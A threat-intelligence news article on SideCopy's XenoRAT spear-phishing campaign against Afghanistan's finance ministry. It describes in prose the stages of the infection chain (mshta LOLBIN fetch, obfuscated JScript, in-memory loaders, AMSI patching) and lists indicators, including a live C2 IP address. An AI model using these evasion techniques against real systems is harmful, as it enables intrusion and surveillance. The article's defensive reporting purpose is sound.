SideCopy Deploys Persistent XenoRAT Against Afghanistan Finance Ministry

Pakistan-linked threat actor SideCopy has launched a highly targeted spear-phishing campaign against Afghanistan’s Ministry of Finance (MoF). The operation surgically targets all 34 provincial revenue directorates, operating under the broader Transparent Tribe (APT36) umbrella.

According to threat intelligence reports from Seqrite, the campaign culminates in the deployment of a customized XenoRAT 1.8.7 implant that beacons to bulletproof European infrastructure.

The attack sequence opens with a ZIP archive containing a malicious LNK file. Threat actors assigned this file a carefully crafted Pashto-language filename translating to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar.”

Using Pashto, the dominant language across Afghanistan’s government institutions, signals deep operational familiarity with the target environment and provincial finance officials.

SideCopy Deploys Persistent XenoRAT

Upon execution, the malware drops a decoy document containing a highly detailed provincial staff directory. This document spans all 34 provinces, listing Finance Directors, Revenue Chiefs, and direct mobile numbers in both Dari and Pashto.

Seqrite notes that this level of detail suggests extensive prior intelligence gathering by the threat actor before launching the campaign.

The campaign executes through a sophisticated infection chain engineered to minimize disk artifacts and evade detection at every layer.

Key stages in this deployment sequence include:

• The LNK file abuses mshta.exe as a Living-off-the-Land Binary (LOLBIN) to silently fetch a remote HTA payload from a compromised Afghan education domain (abimj[.]edu[.]af).
• The second stage delivers a heavily obfuscated JScript payload containing hex-encoded string arrays and a custom Base64 decoding routine to load a Loader DLL.
• Stage three introduces a .NET DLL that drops a decoy PDF while establishing Registry-based persistence under a typosquatting value named “Edgre” to mimic Microsoft Edge.
• A second .NET shellcode loader downloads a disguised payload (ayui.vmxx) and reconstructs it entirely in memory using VirtualAlloc() and CreateThread().
• The malware patches AmsiScanBuffer() to disable AMSI scanning before using Assembly.Load for fully reflective, fileless in-memory execution.

The final stage delivers XenoRAT 1.8.7, which connects to a command-and-control (C2) server over TCP using AES-encrypted, RTL-compressed traffic.

SideCopy enforces single-instance execution on the compromised host using the hardcoded mutex “clouda.” Once deployed, XenoRAT delivers a comprehensive post-exploitation toolkit featuring keylogging, screen capture, webcam surveillance, and SOCKS5 network tunneling.

Seqrite confirmed that this adoption of XenoRAT aligns with SideCopy’s documented shift toward customized open-source malware following prior AsyncRAT campaigns.

The attackers deliberately staged malicious traffic alongside legitimate Afghan government assets, routing the delivery domain to AS58469.

Furthermore, the RAT C2 server (185.235.137.106) relies on a Frankfurt-based bulletproof provider that has previously been tied to other SideCopy infrastructure clusters.

Indicators of Compromise

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.